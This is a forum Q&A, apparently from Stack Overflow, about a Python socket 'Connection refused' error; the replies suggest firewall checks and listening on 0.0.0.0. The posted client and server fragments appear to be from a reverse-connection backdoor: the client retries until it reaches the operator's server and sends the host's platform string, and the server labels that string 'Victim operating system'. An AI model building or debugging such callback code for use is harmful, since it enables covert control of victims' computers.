# [Python]Socket external connection error

Tags: python, sockets, networking, tcp, server

When I'm trying to make an external connection via socket(LIKE CHAT APPLICATION) python I get

> [Errno 111] Connection refused

Image :
[image: Error with socet]
Client Code :

```
while True:
        try:
            self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.connection.connect((ip, port))
            break
        except socket.error as e:
            print(str(e))
            time.sleep(5)
            continue
self.reliable_send(platform.platform())
```

Server image:
[image]
Server Code:

```
def __init__(self, ip="0.0.0.0", port=55000):
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind((ip, port))
        self.listener.listen(1)
        print("[+] Waiting for incoming connections")
        (self.connection, address) = self.listener.accept()
        print("[+] Got a connection from :" + address[0])
        print("[+] Victim operating system :" + self.reliable_receive())
```

What is the error?
I already open this port on my server and the application running on it but it does not get any connection on it!
Thanks

Comment: Please don't include relevant code and errors as image. Include these als text instead. Also, don't just throw your code into the question but explain in detail what you are actually trying to do.

Comment: I already explain what I need exactly,
anyway, thanks, sir.

Comment: It is likely that there is some firewall on the server or in between  blocking the access from the client.

Comment: I checked that on the server, but I opened all the port I need.

Answer (score 0):

Try to listen on `0.0.0.0` instead of `127.0.0.1`